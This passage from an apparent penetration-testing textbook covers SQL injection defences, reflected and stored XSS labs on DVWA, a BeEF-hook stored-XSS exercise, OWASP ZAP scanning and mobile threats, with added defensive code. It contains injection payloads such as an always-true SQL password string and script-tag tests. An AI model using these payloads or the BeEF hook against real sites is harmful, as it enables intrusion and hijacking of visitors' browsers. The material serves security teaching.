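    ).fetchone()
    return row[0] if row else None

def probe_raises(conn, username: str, password: str) -> bool:
    """True if the dynamic query fails with a database error for this input:
    the single-quote probe from Exercise 53 produces exactly this symptom."""
    try:
        login_dynamic(conn, username, password)
        return False
    except sqlite3.Error:
        return True
```

With the dynamic query, the password tom' or '1'='1 logs in as admin because AND binds tighter than OR and the final '1'='1' is always true; with the parameterized query the same input simply fails to match, and the lone quote that produced the error page in Exercise 53 produces no error at all.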
Using a least privileged Database Account
To minimize the potential damage of a successful SQL injection attack, you should minimize the privileges assigned to every database account in your environment. Do not assign DBA or admin type access rights to your application accounts. We understand that this is easy, and everything just 'works' when you do it this way, but it is extremely dangerous. Start from the ground up to determine what access rights your application accounts require, rather than trying to figure out what access rights you need to take away. Make sure that accounts that only need read access are only granted read access to the tables they need access to. If an account only needs access to portions of a table, consider creating a view that limits access to that portion of the data and assigning the account access to the view instead, rather than the underlying table. Rarely, if ever, grant create or delete access to database accounts.
If you adopt a policy where you use stored procedures everywhere, and do not allow application accounts to directly execute their own queries, then restrict those accounts to only be able to execute the stored procedures they need. Do not grant them any rights directly to the tables in the database.
SQL injection is not the only threat to your database data. Attackers can simply change the parameter values from one of the legal values they are presented with to a value that is unauthorized for them, but that the application itself might be authorized to access. As such, minimizing the privileges granted to your application will reduce the likelihood of such unauthorized access attempts, even when an attacker is not trying to use SQL injection as part of their exploit.
While you are at it, you should minimize the privileges of the operating system account that the DBMS runs under. Do not run your DBMS as root or system! Most DBMSs run out of the box with an immensely powerful system account. For example, MySQL runs as system on Windows by default. Change the DBMS's OS account to something more appropriate, with restricted privileges.
Multiple DB Users
The designer of web applications should not only avoid using the same owner/admin account in the web applications to connect to the database; different DB users could be used for different web applications. In general, each separate web application that requires access to the database could have a designated database user account that the web app will use to connect to the DB. That way, the designer of the application can have good granularity in the access control, thus reducing the privileges as much as possible. Each DB user will then have select access to what it needs only, and write access as needed.
As an example, a login page requires read access to the username and password fields of a table, but no write access of any form (no insert, update, or delete). However, the sign-up page certainly requires insert privilege to that table; this restriction can only be enforced if these web apps use different DB users to connect to the database.
Using a WAF (Web Application Firewall)
A Web Application Firewall (WAF) inspects the HTTP traffic coming into or going out of the web site and can prevent attacks stemming from web application security flaws, such as SQL injection, cross-site scripting (XSS), file inclusion and other security flaws. A WAF can be network based or cloud based.

14
Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into trusted websites. XSS attacks occur when an attacker injects JavaScript into a web application; the JavaScript will be executed in users' browsers when they access the website. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. The end user's browser has no way to know that the script should not be trusted and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

14. Cross Site Scripting (XSS)

A cross site scripting vulnerability allows an attacker to insert JavaScript into a web page. JavaScript is a client side scripting language, so when it is executed, it runs on the client machine, not on the server side. When JavaScript is inserted in a website, the script will run on the machines of the people who browse the web page; the web server is only used as the deliverer of the code.
There are three types of XSS vulnerabilities:

Persistent/stored XSS
The JavaScript is stored in the web page, so that any time a user browses the page the code is executed on his machine.

Reflected XSS
The attacker creates a URL and sends it to a user; the code is executed when the user clicks on the URL.

DOM Based XSS
In DOM based XSS the JavaScript runs on the client side without any communication with the web server; the code is interpreted and run in the web browser.
14.1. Discovering XSS vulnerabilities
The easiest way to discover that a website has an XSS vulnerability is to look for forms or other user input points that end up re-displaying or reusing the user data on the site. For example, if there is a box where you can enter your name and your name is then displayed on the next webpage, then entering a script may cause the script to run on the following page, because the script gets interpreted as part of the HTML instead of as a string value. This will only work if user input to the site is not HTML encoded (as it should be), or if you can come up with some obfuscated script that will run despite HTML encoding. There are also many tools that scan websites for XSS vulnerabilities, such as the OWASP ZAP tool.
To find an XSS vulnerability in any website:
• Find all the input fields like search, comment box, username, password, feedback form, contact form.
• One by one, try to inject a simple script like <script>alert("hello Anonymous")</script>. Try this simple script on every text field and analyze the response. If the script runs successfully and shows the alert box, then the website has an XSS vulnerability.

Exercise 60: Example of Reflected XSS

1. Start the Metasploitable machine.
2. From Kali open the web browser and go to the DVWA page.
3. Log in with admin/password, and change the security level to low.
4. Click on the XSS Reflected tab.
5. The page will ask you to put in your name and it will reply with Hello followed by the name.
6. This is just an example; the idea is that you can inject JavaScript into text boxes. Also, looking at the URL you can see that it is a GET URL, so you can inject in the URL as well.
7. In the text box where the site asks "What's your name?" enter the following basic JavaScript:
<script>alert("XSS TEST")</script>
and click Submit.
8. Look at the URL.
9. Now if you send this URL to anyone, the code will be executed in their browser and they will get the alert box.

14.2. Stored XSS vulnerabilities

Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in the web browser of the victim by including malicious code in a legitimate web page or web application. The actual attack occurs when the victim visits the web page or web application that executes the malicious code. The web page or web application becomes a vehicle to deliver the malicious script to the user's browser. Vulnerable vehicles that are commonly used for cross-site scripting attacks are forums, message boards, and web pages that allow comments.
A web page or web application is vulnerable to XSS if it uses unsanitized user input in the output that it generates. This user input must then be parsed by the victim's browser.
Exercise 61: Example of Stored XSS
1. From Kali open the DVWA webpage and log in.
2. Click on XSS Stored and write a name and a message.
3. Open the Windows machine, go to the Metasploitable webpage, then DVWA, then the XSS Stored tab; you will see the message that was written by the Kali user.

Note
This exercise requires three virtual machines open at the same time (Metasploitable, Windows 10 and Kali Linux). If the laptop used has less than 8 GB RAM, the laptop performance will be impacted and it will be very slow.

4. Now go back to the Kali machine and enter JavaScript code in the message body as in the following screenshot.
5. Click on Sign Guestbook.
6. Go back to the Windows 10 machine and just refresh the page in the browser; you will notice that the JavaScript code is executed, and you will receive the alert.

14.3. Injecting a BeEF hook as stored XSS

As we have seen in chapter 9, the BeEF hook code allows us to track, monitor and exploit any machine that accesses a website containing the hook. If a website has a stored XSS vulnerability, attackers can use this vulnerability to inject the BeEF hook JavaScript, which will compromise any machine that accesses that website.
Exercise 62: Injecting a BeEF hook as stored XSS
We explained in Chapter 9 how BeEF can take control of a machine through web browser hooks. In this lesson we are going to inject the BeEF hook into a web page as stored XSS; any person accessing this page will be hooked to BeEF automatically.

1. In the Kali machine open BeEF:
#cd /opt/beef
#./beef
2. Open the web browser and go to the BeEF URL:
http://127.0.0.1:3000/ui/panel
3. Log in as beef/beef.

Note
If you forget the BeEF username and password, check the file /opt/beef/config.yaml

4. Copy the BeEF hook.
5. Insert the hook in the message body, then change the IP address to the Kali IP address. You will need to extend the maximum number of characters of the message body inside the browser to 500 by:
In the Kali machine Firefox that is showing the DVWA webpage, right click and then click on Inspect Element.
Change maxlength to 500.
6. Add the hook URL in a JavaScript tag to the message body, then click Sign Guestbook.
7. The script runs in the Kali machine and it is hooked to BeEF.
8. From the Windows machine just refresh the XSS Stored webpage.
9. See the BeEF webpage in Kali Linux.
10. The Windows machine will be hooked because the hook stored in the webpage connects the Windows machine to the BeEF command center page.

14.4. Preventing XSS Vulnerabilities

Escaping
The first method you can and should use to prevent XSS vulnerabilities from appearing in your applications is escaping user input. Escaping data means taking the data an application has received and ensuring it is secure before rendering it for the end user. By escaping user input, key characters in the data received by a web page will be prevented from being interpreted in any malicious way. In essence, you are censoring the data your web page receives in a way that will disallow the characters (especially the "<" and ">" characters) from being rendered, which otherwise could cause harm to the application and/or users.
If the page does not allow users to add their own code to the page, a good rule of thumb is to escape all HTML, URL, and JavaScript entities. However, if the web page does allow users to add rich text, such as on forums or post comments, you have a few choices. You will either need to carefully choose which HTML entities you will escape and which you will not, or use a replacement format for raw HTML such as Markdown, which will in turn allow you to continue escaping all HTML.
Validating Input
Any untrusted data should be treated as malicious. What is untrusted data? Anything that originates from outside the system and that you do not have absolute control over; that includes form data, query strings, cookies, other request headers, data from other systems (i.e. from web services) and basically anything that you cannot be 100% confident does not contain evil things.
Validating input is the process of ensuring an application is rendering the correct data and preventing malicious data from doing harm to the site, database, and users. While whitelisting and input validation are more commonly associated with SQL injection, they can also be used as an additional method of prevention for XSS. Whereas blacklisting, or disallowing certain predetermined characters in user input, disallows only known bad characters, whitelisting only allows known good characters and is a better method for preventing XSS attacks as well as others.
Input validation is especially helpful and good at preventing XSS in forms, as it prevents a user from adding special characters into the fields, instead refusing the request. However, as OWASP maintains, input validation is not a primary prevention method for vulnerabilities such as XSS and SQL injection, but instead helps to reduce the effects should an attacker discover such a vulnerability.
Sanitizing
A third way to prevent cross-site scripting attacks is to sanitize user input. Sanitizing data is a strong defense but should not be used alone to battle XSS attacks. It is entirely possible you will find the need to use all three methods of prevention in working towards a more secure application. Sanitizing user input is especially helpful on sites that allow HTML markup, to ensure data received can do no harm to users as well as your database, by scrubbing the data clean of potentially harmful markup and changing unacceptable user input to an acceptable format.
WAF
As we explained in previous chapters, a WAF can protect against XSS attacks.
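The following is an added example, not code from the book or from DVWA, that applies the three controls above to the guestbook inputs from Exercises 60 to 62, written in Python so it runs stand-alone. render_escaped() shows output escaping of a name field; validate_name() shows allowlist validation with a server-side length limit (the maxlength attribute edited in Exercise 62 is enforced only by the browser, so the server must enforce its own limit); sanitize_html() keeps an allowlist of harmless formatting tags for a rich-text message field. The name pattern, the tag allowlist and the limits are constructed for the demo.

```python
"""Added example (not from the book): escaping, validating and sanitizing
user input before it is rendered. NAME_RE and ALLOWED are constructed."""
import html
import re
from html.parser import HTMLParser

# Allowlist for a plain name field: letters, space, dot, apostrophe, hyphen,
# at most 50 characters in total (constructed limit, enforced on the server)
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]{0,49}$")

def validate_name(name: str) -> bool:
    """Whitelist validation: reject anything outside the known-good set,
    so <, >, " and ( never reach the page through this field."""
    return bool(NAME_RE.fullmatch(name))

def render_escaped(name: str) -> str:
    """Output escaping: whatever the user typed becomes inert text, so the
    reflected script from Exercise 60 is displayed instead of executed."""
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"

class _Sanitizer(HTMLParser):
    """Allowlist sanitizer for rich text: keeps a few formatting tags, drops
    every other tag and all attributes, and escapes the text in between."""
    ALLOWED = {"b", "i", "em", "strong", "p", "br"}   # constructed allowlist

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ALLOWED:
            self.out.append(f"<{tag}>")      # attributes (onerror, href...) dropped

    def handle_endtag(self, tag):
        if tag in self.ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))

def sanitize_html(markup: str) -> str:
    """Return markup containing only allowlisted tags and escaped text, so a
    stored <script> or BeEF hook tag cannot survive into the guestbook."""
    parser = _Sanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

The sanitizer intentionally keeps the text content of a removed script tag as escaped text: the reader sees alert(1) as characters, which is harmless, while the tag that would have executed it is gone. In practice a maintained library should replace the toy sanitizer, but the rules it enforces (allowlist of tags, no attributes, escape everything else) are the ones any such library applies.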

15
OWASP ZAP
Web Pen-Testing tool

The OWASP Zed Attack Proxy (ZAP) is one of the world's most popular free security tools and is actively maintained by hundreds of international volunteers. The OWASP ZAP tool automates website penetration testing and it is used by most penetration testers.

15. OWASP ZAP Web Site Penetration testing tool

The OWASP ZAP tool, which comes as part of Kali, is a tool that can do vulnerability scanning and penetration testing of web sites automatically; the tool runs all the testing we did manually in the above sections and more.
15.1. Scanning Websites using the OWASP ZAP tool
Exercise 63: Running OWASP ZAP
1. To run the tool, go to the Kali applications menu and search for ZAP.
2. Start the tool.
3. Click Start, then Tools / Options, which will allow you to modify the options.
4. Choose the Default policy, then click OK.
5. Click on Automated Scan.

Exercise 64: Start Website scan

6. To start the scan, type the URL in the page.
7. Then click Attack.
8. The attack will take some time to finish; the tool will first try to find all pages in the website, then it will start the attack based on the policy we chose.
9. You can monitor the attack progress by clicking on the graph icon beside the progress status bar under the Active Scan tab.

Exercise 65: Scan Analysis

When the scan finishes, it gives a summary of the vulnerabilities found in the page, categorized by the severity of the vulnerability, as shown in the screenshot below:
10. The ZAP tool successfully discovered 13 red, 8 orange and 7 yellow flags. Clicking on the alerts will show the details of the alert and what information the tool was able to get from the website; for example, in the screenshot below, the tool was able to read the /etc/passwd file.

16
Mobile Phone Penetration Testing

In this section we will take a brief look at the major threats which are present in current mobile devices, with a focus on iOS and Android, as these two account for 90% of the global mobile device market.
This section will include the following topics:
• Mobile phone attack vectors
• App stores
• Introduction to Android OS
• Introduction to Apple iOS
• Practical exercises about how to hack Android devices

16.1. Introduction
The current global estimate of mobile devices is around 14 billion, with an
estimated 3.5 billion users. The number of devices is anticipated to increase
to 16.8 billion by the year 2023.
With the world growing ever more dependent on mobile services such as online
banking, social media, e-commerce and more, the amount of sensitive data
being transmitted is truly staggering. This mobile revolution has made
mobile security the new front line of cyber security.
The concept of mobile security revolves around identifying the vulnerabilities
within mobile devices, the possible ways these vulnerabilities can be
exploited, and how to protect against cybercriminals who may try to use these
exploits.
16.2. Mobile phone attack vectors

An attack vector is a method or technique that a hacker uses to gain access to
another computing device or network in order to inject "bad code", often called
a payload. The vector lets the attacker exploit system vulnerabilities. Many
attack vectors take advantage of the human element, as it is the weakest
point of the system.
Mobile phone attack vectors are listed in the table below:

16.3. Outcomes of attack vectors

• Data loss: data stored on the mobile phone is lost or taken by the
attacker.
• Use of mobile resources: the attacker may install bot software to
attack other networks, for example launching a DDoS attack from the
victim's mobile phone.
• Reputation loss: the attacker may use the victim's social network
accounts, such as Twitter or Facebook, or the victim's email to send fake
messages to the victim's friends and business partners, or to send threats
to others, which might damage the victim's reputation.
• Identity theft: the attacker may use the victim's data found on the
mobile phone, such as photos, name, address and credit card, to fake the
victim's identity.
Mobile phone attack lifecycle
The mobile phone attack lifecycle starts with the infection phase, followed by
installation of a backdoor and then data exfiltration.

Device Infection
Device infection with spyware is performed differently for Android and iOS
devices.
• Android: victims are tricked into downloading an APK file from a
third-party source, generally through a social engineering attack; the
Android setting "Install unknown apps" must be turned on for external
APK files to be installed. The attacker tricks the victim by offering for
free an application that is not free in the Google Play store, and gives
the victim instructions to allow APKs from unknown sources.
• iOS: iOS infection requires physical access to the mobile.
Infecting the device can also be done by exploiting a zero-day,
such as the JailbreakMe exploit.

Backdoor Installation
Installing a backdoor requires administrator privileges, obtained by rooting
Android devices or jailbreaking Apple devices. Although device manufacturers
put rooting/jailbreaking detection mechanisms in place, mobile spyware can
easily bypass them.
• Android: rooting detection mechanisms do not apply to
intentional rooting.
• iOS: the jailbreaking "community" is vociferous and motivated.

Data Exfiltration
Spyware sends mobile content such as encrypted emails and messages to the
attacker's servers in plain text. The spyware does not directly attack the
secure container; it grabs the data at the point where the user pulls it up
from the secure container to read it. At that stage, when the content has been
decrypted for the user, the spyware takes control of the content and sends it
on.

16.5. App Stores

Google (Play Store) and Apple (App Store) are centralized marketplaces where
authenticated developers show and sell their mobile applications. The
applications they develop are submitted to these marketplaces, making them
available to millions of mobile users. If you download an application from an
official app store, you can trust the application because the hosting store
has vetted it. However, if you download an application from a third-party app
store, there is a possibility of downloading malware along with the
application, because third-party app stores do not vet the apps.
The attacker downloads a legitimate mobile app such as a game, repackages it
with malware or a backdoor, and uploads it to a third-party application store,
from where end users download the malicious game believing it to be genuine.
As a result, the malware gathers user data such as call logs, photos, videos
and sensitive documents and sends it to the attacker without the user's
knowledge. The backdoor lets the attacker upload more malicious software to
the victim's device and use it to attack other devices and networks.
16.6. Introduction to Android OS
Android OS is developed by Google for mobile devices with processing
capabilities such as smartphones and tablets. Its kernel is based on Linux,
and installed applications run in a sandbox.
Sandbox
Android provides a layer of protection because it does not give one
application access to the resources of another. This is known as the
'sandbox': every application plays in its own sandbox and cannot use another
application's resources. Android does this by giving each application a
unique user ID (UID); the application runs as a separate process with that
UID. Only processes with the same UID can share resources, and since each ID
is uniquely assigned, no other app has permission.
This means that if an application attempts to do something it shouldn't, like
reading data from another application or dialling the phone (which is a
separate application), Android blocks it because the app doesn't have the
right privileges. Android antivirus products such as Kaspersky, McAfee and
AVG also run inside a sandbox, which limits what the antivirus can scan.
Permissions
Because Android applications are sandboxed, they can access only their own
files and any world-accessible resources on the device. Such a limited
application would not be remarkably interesting, though, so Android can
grant additional, fine-grained access rights to applications to allow richer
functionality. Those access rights are called permissions, and they can control
access to hardware devices, Internet connectivity, data, or OS services.
Applications request permissions by declaring them in the
AndroidManifest.xml file. At application install time, Android inspects the
list of requested permissions and decides whether to grant them or not. Once
granted, permissions cannot be revoked, and they are available to the
application without any additional confirmation.
Additionally, for features such as private key or user account access, explicit
user confirmation is required for each accessed object, even if the requesting
application has been granted the corresponding permission. Some permissions
can only be granted to applications that are part of the Android OS, either
because they are preinstalled or because they are signed with the same key as
the OS. Third-party applications can define custom permissions and apply
similar restrictions, known as permission protection levels, thus restricting
access to an app's services and resources to apps created by the same author.
Permissions can be enforced at different levels. Requests for lower-level
system resources, such as device files, are enforced by the Linux kernel by
checking the UID or GID of the calling process against the resource's owner
and access bits. When accessing higher-level Android components,
enforcement is performed either by the Android OS or by each component
(or both).
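To make the permission model concrete, here is an added example that is not from the book: a small audit of an AndroidManifest.xml that lists the permissions an app requests, flags the ones Android classifies as "dangerous" (the runtime-prompted group), and reports custom permissions whose protectionLevel is not signature-based, which is the level that limits a permission to apps from the same author. The manifest, the package name and the DANGEROUS subset are all constructed for this example; when vetting a real APK you would first decode the binary manifest (for instance with apktool) and feed the resulting XML to the same function.

```python
import xml.etree.ElementTree as ET

# Android attributes live in this namespace: android:name -> {ns}name
ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS

# Constructed subset of the permissions Android classifies as "dangerous";
# the real platform list is longer.
DANGEROUS = {
    "android.permission.READ_CONTACTS",
    "android.permission.READ_SMS",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.CAMERA",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_EXTERNAL_STORAGE",
}

# Constructed manifest for a hypothetical app (package name invented).
# It declares two custom permissions: one correctly restricted to apps
# signed with the same key, one left at the default "normal" level.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.hypothetical">
  <permission android:name="com.example.hypothetical.permission.READ_DATA"
              android:protectionLevel="normal"/>
  <permission android:name="com.example.hypothetical.permission.ADMIN"
              android:protectionLevel="signature"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <application android:label="Hypothetical"/>
</manifest>
"""


def audit_manifest(xml_text):
    """Return the permissions an app requests, which of them are dangerous,
    and any custom permissions not locked to the author's signing key."""
    root = ET.fromstring(xml_text)

    requested = [el.get(A + "name") for el in root.iter("uses-permission")]
    dangerous = sorted(p for p in requested if p in DANGEROUS)

    weak_custom = []
    for el in root.iter("permission"):
        # protectionLevel defaults to "normal" when omitted, which lets any
        # app that merely declares the permission obtain it.
        level = el.get(A + "protectionLevel", "normal")
        if not level.startswith("signature"):
            weak_custom.append((el.get(A + "name"), level))

    return {
        "requested": requested,
        "dangerous": dangerous,
        "weak_custom": weak_custom,
    }


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    print("requested:", report["requested"])
    print("dangerous:", report["dangerous"])
    print("custom permissions not signature-protected:", report["weak_custom"])
```

The "dangerous" list is what a reviewer compares against the app's stated purpose (a flashlight app asking for READ_SMS is the classic red flag), while a custom permission left at "normal" means the component it guards is effectively open to any app on the device.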
How Android antivirus software works
The primary job of many Android antivirus applications is to scan for
applications from unofficial third parties and check them against a known
list of compromised applications. This is highly dependent on the antivirus
application having an up-to-date list of compromised apps. Android
anti-malware also often looks for rooted devices. Users may root a phone to
access features and information, to bypass the sandboxing features that ask
for access to contacts, texts and more, or to install new or custom ROMs.
Note that by default Android devices do not allow installation of
applications from unknown sources; the user must manually enable the
device to allow installing applications from unknown sources. Rooting an
Android device is not recommended at all, and many Android device
manufacturers warn users that if they root the device, they will lose the
device warranty.
Google Play Protect
Google Play Protect automatically scans all the apps on Android phones and
works to prevent the installation of harmful apps, making it the most widely
deployed mobile threat protection service in the world.
Android Runtime (ART)
Android Runtime (ART) is a process virtual machine that isolates each running
application in Android from the OS kernel and from other running
applications. ART replaced the Dalvik virtual machine runtime as of Android 5
(Lollipop).

16.7. Android Authentication (screen lock)

Android screen lock uses four methods to secure Android devices: patterns,
PIN code, password and biometrics (face recognition and fingerprint).
Biometrics require setting a PIN or a password.
Below are some of the Android screen lock characteristics:
• The lock screen depends on two factors: a PIN code (4 or more
digits) or password, plus the device user ID (UID).
• The device user ID is a physical ID that is part of the device itself.
Android mixes the two to create a hash that is used to allow access and
is used in device data encryption (disk encryption).
• Offline brute force does not work on Android phones because the
PIN code must be entered physically on the phone and cannot
be used remotely.
• Android allows 5 consecutive wrong PIN codes to be entered, then it
locks the device for 30 seconds after each wrong PIN code
for another 5 attempts; after that the lock time increases to 5
minutes after each wrong PIN entered.
• The Find My Phone feature, if enabled, allows the user to erase
the data on the device remotely when the device is connected to the
Internet.

16.8. Introduction to Apple iOS

iOS (formerly iPhone OS) is a mobile operating system created and
developed by Apple Inc. exclusively for its hardware. It is the operating
system that powers many of the company's mobile devices, including the
iPhone and iPod Touch; it also powered the iPad until the introduction of
iPadOS, a derivative of iOS, in 2019. It is the world's second-most widely
installed mobile operating system, after Android. It is the basis for three other
operating systems made by Apple: iPadOS, tvOS, and watchOS. It is
proprietary software, although some parts of it are open source under the
Apple Public Source License and other licenses.
Unveiled in 2007 for the first-generation iPhone, iOS has since been
extended to support other Apple devices such as the iPod Touch (September
2007) and the iPad (January 2010). As of March 2018, Apple's App Store
contains more than 2.1 million iOS applications.
Major versions of iOS are released annually. The current stable version, iOS
14, was released to the public on September 16, 2020. It brought many user
interface changes, including the ability to place widgets on the home screen, a
compact UI for both Siri and phone calls, and the ability to change both the
default web browser and email apps.
Applications
iOS devices come with preinstalled Apple apps including Email, Apple
Maps, TV, FaceTime, Podcasts, Wallet, Health, and many more.
Applications ("apps") are the most general form of application software that
can be installed on iOS. They are downloaded from the official catalog of the
App Store, where apps are subjected to security checks before
being made available to users. iOS applications can also be installed directly
from an IPA file provided by the software distributor, via unofficial means.
They are written using the iOS Software Development Kit (SDK) and, often,
Xcode, using officially supported programming languages,
including Swift and Objective-C. Other companies have also created tools
that allow the development of native iOS apps in their respective
programming languages.
The SDK includes a comprehensive set of development tools, including an audio
mixer and an iPhone simulator. It is a free download for Mac users. It is not
available for Microsoft Windows PCs. To test applications, get technical
support, and distribute applications through the App Store, developers are
required to subscribe to the Apple Developer Program.
IPA files
IPA files are similar to Android APK files: executable packages that can run an
application on an iPhone from outside the App Store. There are many ways to
install the files on the iPhone, such as through a PC using a program called
Cydia Impactor, or over the air using a website. iOS uses a sandbox to
isolate apps, so if the iPhone is not jailbroken the application will be
extremely limited.
Jailbreaking iOS
Jailbreaking is taking control of the iOS operating system used on
Apple devices; in simple words, it is the same as rooting Android devices. It
removes the device's dependence on Apple-approved applications and allows
the user to use third-party apps unavailable in the official App Store.
It is accomplished by installing a modified set of kernel patches that allow
you to run third-party applications not signed by the OS vendor. It is used to
add more functionality to standard Apple devices. It can also provide root
access to the operating system and permits download of third-party
applications, themes, extensions, etc. This removes sandbox restrictions,
which enables malicious apps to access restricted mobile resources and
information.
Jailbreaking, like rooting, also carries some security risks for your device:
• Voids your phone's warranty
• Poor performance
• Malware infection

16.9. iOS Authentication (screen lock)

The iOS screen lock uses a 4- to 6-digit passcode, Face ID (face recognition)
plus passcode, or Touch ID (fingerprint) plus passcode. iOS uses the passcode
together with the device ID to create the encryption key that encrypts all the
files on the iPhone or iPad disk.

Below are some of the iOS screen lock characteristics:
• The Unique Device ID (UID) is a unique identifier for a single device
that is fetched from Apple servers when a user tries to activate the
device using iCloud or the Setup app. This ID is also used by iTunes
to detect the phone or to communicate with it while restoring the
IPSW firmware.
• IPSW is a file format used by iTunes to install iOS firmware. All
Apple devices share the same IPSW file format for iOS firmware,
allowing users to flash their devices through iTunes on macOS and
Windows.
• The passcode key is derived by hashing the passcode and the device ID.
The hashing uses the secret UID (Unique Device Identifier) inside the
Secure Enclave.
• After 5 wrong passcodes, iOS puts a 1-minute delay between
attempts.
• After the 9th attempt the delay is one hour.
• After the 10th failed attempt, the erase-phone procedure starts
and erases all phone data.
• Offline brute force does not work.
• Online brute force leads to the phone erasing its data after 10
attempts, so it does not work either.
• The Apple Find My Phone app is used to track the iPhone location, play
a sound, and erase data.

Mobile Device Management (MDM) software:

MDM is enterprise software to manage and control employee
mobile phones. Both Android and iOS have an API that allows
remote administration of the devices, including changing the
device passcode, erasing device data and more.

16.10. Mobile Application Penetration Testing

There are several ways to test Android and iOS mobile applications. OWASP
published the OWASP Mobile Top 10 list (https://owasp.org/www-project-
mobile-top-10/), which penetration testers should use to verify the security
of a mobile application.
OWASP Mobile Top 10 Risks:
1- M1: Improper Platform Usage
This category covers misuse of a platform feature or failure to use platform
security controls. It might include Android intents, platform permissions,
misuse of Touch ID, the Keychain, or some other security control that is part
of the mobile operating system.
2- M2: Insecure Data Storage
Threat agents include the following: an adversary that has obtained a
lost/stolen mobile device; malware or another repackaged app acting on the
adversary's behalf that executes on the mobile device.
3- M3: Insecure Communication
When designing a mobile application, data is commonly exchanged in a
client-server fashion. When the solution transmits its data, it must traverse the
mobile device's carrier network and the Internet. Threat agents might exploit
vulnerabilities to intercept sensitive data while it is travelling across the wire.
The following threat agents exist:
• An adversary that shares your local network
(compromised or monitored Wi-Fi).
• Carrier or network devices (routers, cell towers, proxies,
etc.).
• Malware on your mobile device.
4- M4: Insecure Authentication
Threat agents that exploit authentication vulnerabilities typically do so
through automated attacks that use available or custom-built tools.
5- M5: Insufficient Cryptography
Threat agents include the following: anyone with physical access to data that
has been encrypted improperly, or mobile malware acting on an adversary's
behalf.
6- M6: Insecure Authorization
Threat agents that exploit authorization vulnerabilities typically do so through
automated attacks that use available or custom-built tools.
7- M7: Poor Code Quality
Threat agents include entities that can pass untrusted inputs to method calls
made within mobile code. These types of issues are not necessarily security
issues in and of themselves but lead to security vulnerabilities. For example,
buffer overflows within older versions of Safari (a poor code quality
vulnerability) led to high-risk drive-by jailbreak attacks. Poor code-quality
issues are typically exploited via malware or phishing scams.
8- M8: Code Tampering
Typically, an attacker will exploit code modification via malicious forms of
the apps hosted in third-party app stores. The attacker may also trick the user
into installing the app via phishing attacks.
9- M9: Reverse Engineering
An attacker will typically download the targeted app from an app store and
analyze it within their own local environment using a suite of different tools.
10- M10: Extraneous Functionality
Typically, an attacker seeks to understand extraneous functionality within a
mobile app to discover hidden functionality in backend systems. The
attacker will typically exploit extraneous functionality directly from their
own systems without any involvement by end users.
Exercise 66: Setting up Android testing environment

The following tools are needed to test Android devices:
• Android Studio for PC, mainly to use the Android phone emulator.
• Android SDK for PC, to use the ADB tool to communicate with and
send commands to the Android phone emulator and a physical
Android phone.
• A physical Android phone.

Note
For this exercise we are going to use a Windows machine, because the Android
phone emulator comes with its own virtual environment and will not work if
installed inside a virtual machine, because virtual machines need hardware
acceleration: you cannot run a virtual machine inside a virtual machine. The
Kali machine we were using in the previous exercises is a virtual machine, so
we cannot use it for Android testing. If you have Kali as your main OS, then
you can use the above-mentioned tools with Kali.
Android Studio is the official Integrated Development Environment (IDE) for
Android app development, based on IntelliJ IDEA. On top of IntelliJ's powerful
code editor and developer tools, Android Studio offers even more features that
enhance your productivity when building Android apps, such as:
• A flexible Gradle-based build system.
• A fast and feature-rich emulator.
• A unified environment where you can develop for all Android devices.
• Apply Changes to push code and resource changes to your running app
without restarting your app.
• Code templates and GitHub integration to help you build common app
features and import sample code.
• Extensive testing tools and frameworks.
• Lint tools to catch performance, usability, version compatibility, and
other problems.
• C++ and NDK support.
• Built-in support for Google Cloud Platform, making it easy to integrate
Google Cloud Messaging and App Engine.

Android Studio minimum requirements:
• Microsoft® Windows® 7/8/10 (64-bit).
• 4 GB RAM minimum, 8 GB RAM recommended.
• 2 GB of available disk space minimum; 4 GB recommended (500 MB for
the IDE + 1.5 GB for the Android SDK and emulator system image).
• 1280 x 800 minimum screen resolution.
1. Download and install Android Studio from
https://developer.android.com/.
2. Download and install the SDK from https://developer.android.com/.
3. The SDK contains the Android Debug Bridge (ADB).

Android Debug Bridge (adb)

Android Debug Bridge (adb) is a versatile command-line tool that lets you
communicate with an Android device. The adb command facilitates a variety of
device actions, such as installing and debugging apps, and it provides access
to a Unix shell that you can use to run a variety of commands on a device. It
is a client-server program that includes three components:
• A client, which sends commands; it runs on the development machine,
and you invoke it from a command-line terminal by issuing an adb
command.
• A daemon (adbd), which runs commands on a device. The
daemon runs as a background process on each device.
• A server, which manages communication between the client
and the daemon. The server runs as a background process on
your development machine.

4- Start Android Studio and start a new project for the first time.
5- In Android Studio open the AVD Manager.
6- Choose Pixel, or create a new virtual device by clicking on the +
sign.
7- Start the virtual device.
8- Navigate to the downloaded SDK folder, called Platform-tools,
and unzip it.
9- Shift + right-click in the empty space to open a PowerShell window.
10- Type >./adb to see the tool's help menu.
11- Type >./adb devices to connect to the emulator.
12- Type >./adb shell to get access to the Android shell.
13. Note that I get root privileges because the emulator is rooted.
14. Type #top to see all the running processes in the virtual Android
device.
15. Type Ctrl + C to exit top.
16. Type #exit to exit from the shell.
17. Close the virtual phone emulator.
18. Make sure the virtual phone emulator is not connected to the ADB
tool.

Exercise 67: Connecting a Physical android Phone to ADB tool

1. Enable USB debugging on the physical phone.
2. I am using a Samsung S8+ for the test; below is the procedure on how
to enable USB debugging for the Samsung Galaxy S8. It might be
slightly different for other Android devices.
